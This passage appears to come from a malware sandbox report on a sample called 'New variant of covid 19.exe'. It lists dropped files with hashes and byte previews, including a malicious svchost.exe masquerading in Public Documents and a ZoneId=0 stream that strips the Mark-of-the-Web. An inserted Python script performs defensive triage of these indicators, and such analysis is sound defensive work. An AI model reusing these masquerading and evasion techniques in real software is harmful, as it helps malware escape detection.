                                                                        Malicious:false
                                                                        Preview: ....E..h..(..........yO.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@........................yO...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9ddcdd19, page size 16384, DirtyShutdown, Windows version 10.0
                                                                        Category:dropped
                                                                        Size (bytes):131072
                                                                        Entropy (8bit):0.09748143624764614
                                                                        Encrypted:false
                                                                        SSDEEP:24:0l9Oil9OjPMOjPMOaLOaLOSPJ4L6PJ4L:6OIOjUOjUOAOAOSPw6Pw
                                                                        MD5:D13D2A37E75A3512CD16100B95D17F3A
                                                                        SHA1:1CC7CB2250B6A8F925F74E42118DB906F4C7F0E9
                                                                        SHA-256:B3B32BB5F6642964CB049C0FCC541AA13DBC437837271602EF7A6030113F6B0E
                                                                        SHA-512:9ED6DD53362DF95E90D25ACB9F8FEA5FA74E6A4173F01EFF4503F9677F92DBC5E3C64AFA5E05BE6967C05D30D29519236E8C21E781927085B46147CE08CD1F13
                                                                        Malicious:false
                                                                        Preview: ....... ................e.f.3...w........................&..........w.......yO.h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w.......................................................................................................................................................................................................................................[p).....y.m................9n.......yO.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):32768
                                                                        Entropy (8bit):0.1148485438083448
                                                                        Encrypted:false
                                                                        SSDEEP:6:45Xsct410EOATiscy7ZlNv+83isctstlA88StTrsztleJ:4ht4NOXy7UtswUteO
                                                                        MD5:39FBED624E984B941C1584EF4C713A16
                                                                        SHA1:08D7D163A0EF14BE11040850E7B6D86D6259A8F4
                                                                        SHA-256:60D35D38000E86D891D2DBD2B38E682CE942C935531ED53411B2E775A824F60F
                                                                        SHA-512:F485136BC0B17474B2771ECB659E072807F613F0F749D82BFA4165DE20BA442693F185B35509A67DC90C3583BC38BED13705F237E018E6739455F9FF7F33ECAC
                                                                        Malicious:false
                                                                        Preview: .6lR.....................................3...w.......yO......w...............w.......w....:O.....w..................9n.......yO.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_New variant of c_e98153242e2463491fed9836c52db2aa5aff77_4c54b198_1517500f\Report.wer
                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):17456
                                                                        Entropy (8bit):3.7705204746922343
                                                                        Encrypted:false
                                                                        SSDEEP:192:5R6HGmuW5OmHBUZMXCaKs9oQ7O27/u7srS274It6m:SfuWhBUZMXCaPOk/u7srX4It6m
                                                                        MD5:63B30434E203C24A496F3C4684FA6E3D
                                                                        SHA1:3323E7E7C7EEFFE0B53C572CEA7D84A664D74B3D
                                                                        SHA-256:499C54C89B90D03F075DF63E81F3F9D37E470C2182CDC545B9DD2958D4FFC85F
                                                                        SHA-512:B0A646298E61CB06802D513CD81C16B70B9C2928A8D213456D9132D4070C5480E357C768C9606FCD924F14D985E8160C345E9E9DA9F624894CEA884CE9CECC6F
                                                                        Malicious:false
                                                                        Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.9.8.3.0.7.3.9.9.1.6.9.7.7.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.9.8.3.0.7.4.1.6.6.6.9.7.3.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.4.4.3.6.a.0.b.-.e.6.d.9.-.4.a.6.b.-.9.e.8.7.-.3.d.f.f.f.3.e.a.6.3.3.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.8.4.0.8.b.e.7.-.1.2.0.1.-.4.5.b.5.-.b.8.9.8.-.0.4.b.2.4.b.f.d.b.0.5.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.N.e.w. .v.a.r.i.a.n.t. .o.f. .c.o.v.i.d. .1.9...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.Y.N.c.e.g.b.h. .O.A.a.E.n.t.X.r.D.d.b.r.C...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.e.4.-.0.0.0.1.-.0.0.1.7.-.c.4.7.5.-.3.1.3.6.7.5.1.5.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.7.3.5.e.4.f.4.5.6.9.f.a.6.a.5.0.6.f.f.b.b.1.6.2.3.2.8.d.4.7.0.0.0.0.0.9.0.4.!.0.0.0.0.b.7.6.7.f.e.6.
                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4292.tmp.dmp
                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                        File Type:Mini DuMP crash report, 15 streams, Wed Mar 10 06:19:00 2021, 0x1205a4 type
                                                                        Category:dropped
                                                                        Size (bytes):343667
                                                                        Entropy (8bit):3.631058320122662
                                                                        Encrypted:false
                                                                        SSDEEP:3072:3uoi+Qw9gIOgF5gbitSE0JsxUCgUHtnfVxT0ooe/440mnjd+p/9CzCprFb:D9RpDgeTTjNf0B40mQpVXb
                                                                        MD5:C05920B7C7138016CABEBBB1908FB7E2
                                                                        SHA1:B3E37F4F6A2FD267DA2771AA805E0356A7294F1C
                                                                        SHA-256:5D6AD1F09E8DA339D0E58C038618F09E1E24CDD5FF861AB7A96DB0236B6CCC1D
                                                                        SHA-512:006A8E8BFAFE3D690E5845E092B77053090254CDF0CBD0B9CFEC5D94716DC9BEDBAFC33356E59FC632640D506ED26172CCCDFBCB297D8FD1E21A7059FC23B0F4
                                                                        Malicious:false
                                                                        Preview: MDMP....... ........dH`...................U...........B.......0......GenuineIntelW...........T............dH`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4840.tmp.WERInternalMetadata.xml
                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):8484
                                                                        Entropy (8bit):3.6954421801135404
                                                                        Encrypted:false
                                                                        SSDEEP:192:Rrl7r3GLNi066p6YSzSUpAgEDgmfZLS5Cpr589bu6sfV6m:RrlsNiR6p6YGSUpAgEDgmfVSXuZf5
                                                                        MD5:0AF396BB1DD94BFDEE4A70B8FE2F2FF1
                                                                        SHA1:19754582D2D13F5CE3D73F3811BC6673F67CAC0E
                                                                        SHA-256:786C27AC3C18A5A8EFDFB65966CC629FD674854E7D543A52A74E4C9A8A31AFCB
                                                                        SHA-512:F4B2E3CDA93DFEB5384A801B05D2371908DDDB63770C25C100DEFB1655D58020AC8FD3D4CCB856399262F24C9F38486E2C5D00DA8D92FA6D1C3BD9AF97F83772
                                                                        Malicious:false
                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.3.7.2.<./.P.i.d.>.......
                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER48DD.tmp.xml
                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4842
                                                                        Entropy (8bit):4.483864038775725
                                                                        Encrypted:false
                                                                        SSDEEP:48:cvIwSD8zsyJgtWI98yWSC8B38fm8M4JbuAFFh+q8v9AubDQM7TZKuKe9d:uITfAnTSNGJbumK9FbUM71KuKe9d
                                                                        MD5:9E1149FFB2181D5A290D75B878FCDADF
                                                                        SHA1:B09295AE7E50FEB4B6CB846A23BC5C9FE3E07BC3
                                                                        SHA-256:5D5FB92C86AE78EC248789600BEDDBCA30707AD5CD1F9EF172BAB82781BAE93C
                                                                        SHA-512:C2124A1C9FF8406F448D25DF1CF11AAF492B0CE4472995973BEE548EE3280867C263BE66E2F7BC72528E16A92CF848F50AB0551814B00FD8FF90F0342AE46A4C
                                                                        Malicious:false
                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="895169" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                        C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe
                                                                        Process:C:\Users\user\Desktop\New variant of covid 19.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):45816
                                                                        Entropy (8bit):6.247071799238702
                                                                        Encrypted:false
                                                                        SSDEEP:768:A1+uC50TPNWMtxscrP3v0lH51S+T8rBItHvhZQ96xdfBu2uAHubhK:ApPT1x53vW1TSItPbJL
                                                                        MD5:A489513CA0DE2472E0AD79830DD9AC44
                                                                        SHA1:B767FE686E074F551773F208E1CB756D114E38C4
                                                                        SHA-256:DF12835CD6BC77F9724900D2BF8F0403364CE6E8E81D389F8DC3B2EB8CA42961
                                                                        SHA-512:E5CDDFC3C32AF524AB2CA1CB671034C0D46F1B3D4E83E98FB0FD5AF198FBFBC93651E8381FCDE18F40558994C5F2F76D6A8A6304DD4C7EDC6DE93A2EF912DD5C
                                                                        Malicious:true
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....r..........."...0.................. ........@.. ...................................@.................................L...O.......p............................................................................ ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc..............................@..B........................H.......d;...v......S....................................................*".(<....*>..r4#.p.o@....*".(A....*Vsk...(B...t.........*.r.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pz*~r.#.pzr.#.pzr.#.pzr.#.pzr.#.pz*.r.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pz*.r.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pz*.r.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pz*.r.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pzr.#.pz*.0...........r...pr#..p(..........(.....re..p....r{..p....s........r
                                                                        C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe:Zone.Identifier
                                                                        Process:C:\Users\user\Desktop\New variant of covid 19.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:modified
                                                                        Size (bytes):26
                                                                        Entropy (8bit):3.95006375643621
                                                                        Encrypted:false
                                                                        SSDEEP:3:ggPYV:rPYV
                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                        Malicious:true
                                                                        Preview: [ZoneTransfer]....ZoneId=0
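The two records above belong together: the dropped C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe (a PE32 .NET assembly written by the sample into a user-writable folder) and the Zone.Identifier stream the sample wrote next to it, whose 26 bytes read "[ZoneTransfer]", a blank line and "ZoneId=0". The following is an added triage example, not code from the report or from the sandbox vendor. It encodes the three checks a responder applies to such records: a Windows system binary name sitting outside System32 / SysWOW64, a dropped file whose hashes equal the submitted sample's (the sample copied itself rather than dropping a new stage), and a Zone.Identifier stream rewritten with ZoneId=0 (Local Machine zone), which is what strips the Mark-of-the-Web from the copy. The records are constructed from the fields above; the submitted sample's hashes are an input a responder takes from the report summary and are assumed here to equal the dropped file's, which is the case the check is meant to catch.

```python
"""Added triage example for the two svchost.exe records above (not report code)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Names that only legitimately execute from the Windows directory.
SYSTEM_BINARY_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "services.exe", "wininit.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# URL security zone IDs as written into the Zone.Identifier stream.
ZONE_NAMES = {0: "LocalMachine", 1: "LocalIntranet", 2: "TrustedSites",
              3: "Internet", 4: "RestrictedSites"}


@dataclass
class DroppedFile:
    path: str
    process: str
    md5: str
    sha256: str
    size: int
    content: bytes  # full content for tiny streams, otherwise whatever preview is available


def is_masquerading_system_binary(path: str) -> bool:
    """True when a system binary name sits outside System32 / SysWOW64."""
    lower = path.lower()
    name = lower.rsplit("\\", 1)[-1]
    return name in SYSTEM_BINARY_NAMES and not lower.startswith(SYSTEM_DIRS)


def is_self_copy(rec: DroppedFile, sample_md5: str, sample_sha256: str) -> bool:
    """True when both hashes of the dropped file equal the submitted sample's."""
    return (rec.md5.lower() == sample_md5.lower()
            and rec.sha256.lower() == sample_sha256.lower())


def parse_zone_identifier(data: bytes) -> Dict[str, str]:
    """Parse the INI-style Zone.Identifier stream; returns the [ZoneTransfer] keys."""
    fields: Dict[str, str] = {}
    section = None
    for line in re.split(r"\r\n|\n|\r", data.decode("utf-8", errors="replace")):
        line = line.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif section == "ZoneTransfer" and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def zone_finding(rec: DroppedFile) -> Optional[str]:
    """A Zone.Identifier stream claiming ZoneId=0 (Local Machine) is the MOTW-removal case."""
    fields = parse_zone_identifier(rec.content)
    if not fields.get("ZoneId", "").isdigit():
        return None
    zone = int(fields["ZoneId"])
    if zone != 0:
        return None  # ZoneId 3 (Internet) is the normal mark on a downloaded file
    return (f"{rec.path}: ZoneId=0 ({ZONE_NAMES[0]}) written by {rec.process}; "
            "Mark-of-the-Web removed from the dropped copy")


def triage(records: List[DroppedFile], sample_md5: str, sample_sha256: str) -> List[str]:
    """Run the three checks over dropped-file records and return the findings."""
    findings: List[str] = []
    for rec in records:
        if rec.path.endswith(":Zone.Identifier"):
            finding = zone_finding(rec)
            if finding:
                findings.append(finding)
            continue
        if is_masquerading_system_binary(rec.path):
            findings.append(f"{rec.path}: system binary name outside the Windows directory")
        if is_self_copy(rec, sample_md5, sample_sha256):
            findings.append(f"{rec.path}: hashes identical to the submitted sample (self-copy)")
    return findings


# Constructed from the two records above; hashes and sizes copied from the report.
DROPPED = [
    DroppedFile(
        path=r"C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe",
        process=r"C:\Users\user\Desktop\New variant of covid 19.exe",
        md5="A489513CA0DE2472E0AD79830DD9AC44",
        sha256="DF12835CD6BC77F9724900D2BF8F0403364CE6E8E81D389F8DC3B2EB8CA42961",
        size=45816,
        content=b"MZ\x90\x00",  # only the first preview bytes; the checks do not need more
    ),
    DroppedFile(
        path=r"C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe:Zone.Identifier",
        process=r"C:\Users\user\Desktop\New variant of covid 19.exe",
        md5="187F488E27DB4AF347237FE461A079AD",
        sha256="255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309",
        size=26,
        # The 26-byte stream as previewed: "[ZoneTransfer]", CRLF CRLF, "ZoneId=0".
        content=b"[ZoneTransfer]\r\n\r\nZoneId=0",
    ),
]
# Input a responder takes from the report summary; assumed here to equal the dropped file's
# hashes, which is the self-copy case the check is meant to catch.
SAMPLE_MD5 = "A489513CA0DE2472E0AD79830DD9AC44"
SAMPLE_SHA256 = "DF12835CD6BC77F9724900D2BF8F0403364CE6E8E81D389F8DC3B2EB8CA42961"

if __name__ == "__main__":
    for finding in triage(DROPPED, SAMPLE_MD5, SAMPLE_SHA256):
        print(finding)
```

On a live host the same stream is read with `open(path + ":Zone.Identifier", "rb")`; a file that was genuinely created locally normally has no Zone.Identifier stream at all, so an explicit ZoneId=0 is itself the tell, independent of what the file contains.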
                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                        Process:C:\Users\user\Desktop\New variant of covid 19.exe
                                                                        File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                        Category:dropped
                                                                        Size (bytes):58596
                                                                        Entropy (8bit):7.995478615012125
                                                                        Encrypted:true
                                                                        SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                        MD5:61A03D15CF62612F50B74867090DBE79
                                                                        SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                        SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                        SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                        Malicious:false
                                                                        Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                        Process:C:\Users\user\Desktop\New variant of covid 19.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):326
                                                                        Entropy (8bit):3.0997736875329633
                                                                        Encrypted:false
                                                                        SSDEEP:6:kK7QkPkwTJ6YN+SkQlPlEGYRMY9z+4KlDA3RUe0ht:jQskwTJ6HkPlE99SNxAhUe0ht
                                                                        MD5:C0C84513E4F41BE3238884A35D13F1FE
                                                                        SHA1:D491CA0E58BB3E79F3A4426F69664E5A9599BACA
                                                                        SHA-256:34DADEF365AC9B7C7BD80E76F1C46EE6F8E8CF0EAED91EF2837B17C31D201F6D
                                                                        SHA-512:314E1479976E42C4D3B4779D25A7E4B8E344A8590E62CE01BDB18FB3CAB6675A6E1690DEE3F4953959A76C631D25B8FC1BB8C6DE2B100849E8297B776449C6F8
                                                                        Malicious:false
                                                                        Preview: p...... ...........6u...(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                                        C:\Users\user\AppData\Local\DdUPmLN_kgoHVaSIjqNjSlvYS\New_variant_of_covid_19.e_Url_0vajnaqbdmy0dt0v3gl1hvcjtehbwrpa\2.792.19.755\tosfmudg.newcfg
                                                                        Process:C:\Users\user\Desktop\New variant of covid 19.exe
                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2527795
                                                                        Entropy (8bit):3.0591944636233315
                                                                        Encrypted:false
                                                                        SSDEEP:12288:7O7DUP8gwUeJcfRP31tcKDKYFh14NS+MjQxRURB67WZM4ygmGsnWlET9linK3vv9:iXf/Gbfcj
                                                                        MD5:AB55DB4D124A772294EDE8E9E8288F53
                                                                        SHA1:9E1071D3935F13D04ACD9B29FBD7FF8D857373B1
                                                                        SHA-256:88EC5DC9338D281F17A70DCB770B1B14CE81FDC9D30951CC4B4F96C7819F3D14
                                                                        SHA-512:30374E94FEA125AA05101CD8B77DC5235DF8023FF843DB279726EB1464035DACD65047E3392F12B1AB024235988A1344823B483319F43DCF413F5A184C4A19EE
                                                                        Malicious:false
                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >.. <section name="OFsolWNmcACanMRUGVrizHZQUfsWIOTyZhqcUVDdVirxOPB.BFGYtGVcaKuKMuwoE" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <userSettings>.. <OFsolWNmcACanMRUGVrizHZQUfsWIOTyZhqcUVDdVirxOPB.BFGYtGVcaKuKMuwoE>.. <setting name="AYhFcoOUTPAsNEJFbVkZa" serializeAs="String">.. <value>77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97
                                                                        C:\Users\user\AppData\Local\DdUPmLN_kgoHVaSIjqNjSlvYS\svchost.exe_Url_0aeimnckxwjoc2ntwml1gvkearlpscly\2.792.19.755\1m4vpdph.newcfg
                                                                        Process:C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe
                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2527796
                                                                        Entropy (8bit):3.059200695461018
                                                                        Encrypted:false
                                                                        SSDEEP:12288:9O7DUP8gwUeJcfRP31tcKDKYFh14NS+MjQxRURB67WZM4ygmGsnWlET9linK3vv9:UXf/Gbfcj
                                                                        MD5:9E1FF7809698037170AF07A9B1C0E5C5
                                                                        SHA1:C3B4A1C7F0450DA5E0610DB733A42F5AD5A4F40B
                                                                        SHA-256:B06892FBF76511BCD1BB510B226B2736BF9CAEF3CB2788760CF18F60FFBA2224
                                                                        SHA-512:4072ABA69B9EB284A7A32DE26AA28B383F32B98832FF86F645B8B0E0FEE41A2D1DCBF4F9583F0702ACDB54A961A25661666CA9694309FD39572CAF1B21001374
                                                                        Malicious:false
                                                                        Preview: x<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >.. <section name="OFsolWNmcACanMRUGVrizHZQUfsWIOTyZhqcUVDdVirxOPB.BFGYtGVcaKuKMuwoE" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <userSettings>.. <OFsolWNmcACanMRUGVrizHZQUfsWIOTyZhqcUVDdVirxOPB.BFGYtGVcaKuKMuwoE>.. <setting name="AYhFcoOUTPAsNEJFbVkZa" serializeAs="String">.. <value>77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 9
                                                                        C:\Users\user\AppData\Local\DdUPmLN_kgoHVaSIjqNjSlvYS\svchost.exe_Url_0aeimnckxwjoc2ntwml1gvkearlpscly\2.792.19.755\3tlladac.newcfg
                                                                        Process:C:\Users\Public\Documents\sfTrQxoCTFZPN\svchost.exe
                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2527795
                                                                        Entropy (8bit):3.0591944636233315
                                                                        Encrypted:false
                                                                        SSDEEP:12288:7O7DUP8gwUeJcfRP31tcKDKYFh14NS+MjQxRURB67WZM4ygmGsnWlET9linK3vv9:iXf/Gbfcj
                                                                        MD5:AB55DB4D124A772294EDE8E9E8288F53
                                                                        SHA1:9E1071D3935F13D04ACD9B29FBD7FF8D857373B1
                                                                        SHA-256:88EC5DC9338D281F17A70DCB770B1B14CE81FDC9D30951CC4B4F96C7819F3D14
                                                                        SHA-512:30374E94FEA125AA05101CD8B77DC5235DF8023FF843DB279726EB1464035DACD65047E3392F12B1AB024235988A1344823B483319F43DCF413F5A184C4A19EE
                                                                        Malicious:false
